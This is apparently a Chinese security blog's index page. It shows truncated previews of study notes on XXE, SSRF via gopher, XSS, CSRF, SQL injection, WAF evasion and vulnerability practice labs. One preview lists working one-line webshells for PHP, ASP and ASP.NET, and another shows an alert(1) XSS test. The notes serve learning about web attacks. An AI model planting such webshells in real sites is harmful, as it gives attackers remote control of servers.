什么是XXE
概述
XXE:XML External Entity 即XML外部实体。
攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行。
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
现况
现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。
以PHP为例,在PHP里面解析xml用的……继续阅读 »
langsa
3年前 (2021-12-31) 653浏览 0评论
2个赞
0×00 前言
大家好,我是掌控安全学院的聂风,SSRF(服务器端请求伪造)漏洞是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。SSRF很多渗透测试人员都知晓,我记忆最深刻的就是白帽大会上面所提及的,虽然SSRF现在被重视了起来,但是还是有很多渗透测试人员,遇到SSRF仅仅就使用HTTP协议看看有没有内网的网站,或者是使用file协议去读取一些本地敏感文件。我这里科普一个gopher协议,看看他能做什么。
0×……继续阅读 »
langsa
3年前 (2021-12-21) 672浏览 0评论
3个赞
一句话木马
PHP:
<?php @eval($_POST['chopper']);?>
ASP:
<%eval request("chopper")%>
ASP.NET:
<%@ Page Language="Jscript"%><%eval(Request.Item["z&q……继续阅读 »
langsa
3年前 (2021-12-07) 617浏览 0评论
3个赞
原理:前端代码注入
条件:
1.用户能够控制输入
2.程序执行的代码拼接了用户输入的数据。
类型
反射型XSS:必须一次性输入所有恶意语句,利用条件苛刻
存储型XSS:持久性,将我们的恶意语句存储起来再触发(存储到了服务器)
DOM型XSS:基于DOM对象的XSS
常见的触发检测方法
利用script弹窗标签 :<script>alert(1)</script> alert(1):利用……继续阅读 »
langsa
3年前 (2021-12-07) 616浏览 0评论
3个赞
Cookie:代表你身份的东西存储在浏览器
同源策略:A网站填充A Cookie
时效性:默认情况下 一次会话(浏览器重启)
XSS:窃取cookie
CSRF:利用cookie
CSRF防御:
1.验证 HTTP Referer 字段;
2.在请求地址中添加 token 并验证;
3.在 HTTP 头中自定义属性并验证。
CSRF漏洞产生的原因:是网站对用户的身份没有进……继续阅读 »
langsa
3年前 (2021-12-07) 625浏览 0评论
3个赞
XSS基础
跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaS……继续阅读 »
langsa
3年前 (2021-12-03) 683浏览 0评论
2个赞
常见数据库参考:
https://blog.csdn.net/gengkui9897/article/details/89294936
数据库语法学习:
https://www.w3school.com.cn/sql/sql_syntax.asp
常见数据库的区别:
https://blog.csdn.net/qq_34193883/article/details/86996995
https://blog.csdn……继续阅读 »
langsa
3年前 (2021-12-03) 605浏览 0评论
2个赞
注入:核心是什么?把输入当作代码,可以是url,可以是表单,还可以是数据包中的任何一个参数
以下皆以以MySQL为例,如有特例会注明。
如果觉得描述的过于简单,会有详述文章供参考。
显错注入
网页页面中在与数据库交互过程中会在特定位置显示数据库中的数据
通过特殊语句来用特定字符来占领显错位,将显错位替换为sql语句,即可得到数据库数据
1.判断是否存在注入
2.判断字段数
3.判断显错位
4.判断库名
5.判断表名
……继续阅读 »
langsa
3年前 (2021-12-03) 575浏览 0评论
2个赞
WAF(web application firewall):Web应用防火墙
WAF为了防御网站被入侵的常见手段:
检测到入侵者会拦截你当前访问的页面,或者跳转到其他界面,再或者直接ban你的IP。
WAF类型:
硬件WAF:有个设备,在网关的地方放一个设备
软件WAF:软件安装
云WAF:云服务上,应该是硬件或软件形式存在的
区别不大,都是WAF,只不过是规则不同罢了。
WAF的核心检测机制就是正则表达式,通过开发……继续阅读 »
langsa
3年前 (2021-12-01) 629浏览 0评论
2个赞
浪飒
漏洞及渗透练习平台
WebGoat漏洞练习环境
https://github.com/WebGoat/WebGoat
https://github.com/WebGoat/WebGoat-Legacy
Damn Vulnerable Web Application(漏洞练习平台)
https://github.com/RandomStorm/DVWA
数据库注入练习平……继续阅读 »
langsa
3年前 (2021-12-01) 650浏览 0评论
2个赞
